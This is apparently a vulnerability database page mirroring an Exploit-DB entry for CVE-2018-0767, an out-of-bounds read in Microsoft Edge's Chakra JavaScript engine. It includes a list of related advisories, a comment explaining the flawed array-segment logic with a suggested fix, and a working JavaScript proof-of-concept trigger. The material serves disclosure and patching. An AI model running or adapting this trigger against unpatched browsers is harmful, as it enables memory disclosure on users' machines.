Microsoft Edge Chakra - 'AppendLeftOverItemsFromEndSegment' Out-of-Bounds Read
🗓️ 11 Jan 2018 00:00:00Reported by Google Security ResearchType
exploitdb🔗 www.exploit-db.com👁 21 Views
| Reporter | Title | Published | Views | Family All 29 |
|---|---|---|---|---|
| CVE-2018-0767 | 11 Jan 201800:00 | – | circl | |
| Microsoft Edge Scripting Engine Information Disclosure Vulnerability (CNVD-2018-00530) | 5 Jan 201800:00 | – | cnvd | |
| Microsoft Edge Out Of Bounds Read Information Disclosure (CVE-2018-0767) | 15 Jan 201800:00 | – | checkpoint_advisories | |
| CVE-2018-0767 | 4 Jan 201814:00 | – | cve | |
| CVE-2018-0767 | 4 Jan 201814:00 | – | cvelist | |
| January 3, 2018—KB4056888 (OS Build 10586.1356) | 9 Jan 201808:00 | – | mskb | |
| January 3, 2018—KB4056890 (OS Build 14393.2007) | 9 Jan 201808:00 | – | mskb | |
| January 3, 2018—KB4056891 (OS Build 15063.850) | 9 Jan 201808:00 | – | mskb | |
| January 3, 2018—KB4056892 (OS Build 16299.192) | 9 Jan 201808:00 | – | mskb | |
| KLA11166 Multiple vunlerabilities in Microsoft Browsers | 3 Jan 201800:00 | – | kaspersky |
10
/*
Here's a snippet of AppendLeftOverItemsFromEndSegment in JavascriptArray.inl.
growby = endSeg->length;
current = current->GrowByMin(recycler, growby);
CopyArray(current->elements + endIndex + 1, endSeg->length,
((Js::SparseArraySegment<T>*)endSeg)->elements, endSeg->length);
LinkSegments((Js::SparseArraySegment<T>*)startPrev, current);
if (HasNoMissingValues())
{
if (ScanForMissingValues<T>(endIndex + 1, endIndex + growby))
{
SetHasNoMissingValues(false);
}
}
In the "ScanForMissingValues" method, it uses "head". But it doesn't check the grown segment "current" is equal to "head" before calling the method.
I guess it shoud be like:
if (current == head && HasNoMissingValues())
{
if (ScanForMissingValues<T>(endIndex + 1, endIndex + growby))
{
SetHasNoMissingValues(false);
}
}
*/
function trigger() {
let arr = [1.1];
let i = 0;
for (; i < 1000; i += 0.5) {
arr[i + 0x7777] = 2.0;
}
arr[1001] = 35480.0;
for (; i < 0x7777; i++) {
arr[i] = 1234.3;
}
}
for (let i = 0; i < 100; i++) {
trigger();
}Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
11 Jan 2018 00:00Current
6.5Medium risk
Vulners AI Score6.5
CVSS 22.6
CVSS 35.3
EPSS0.65467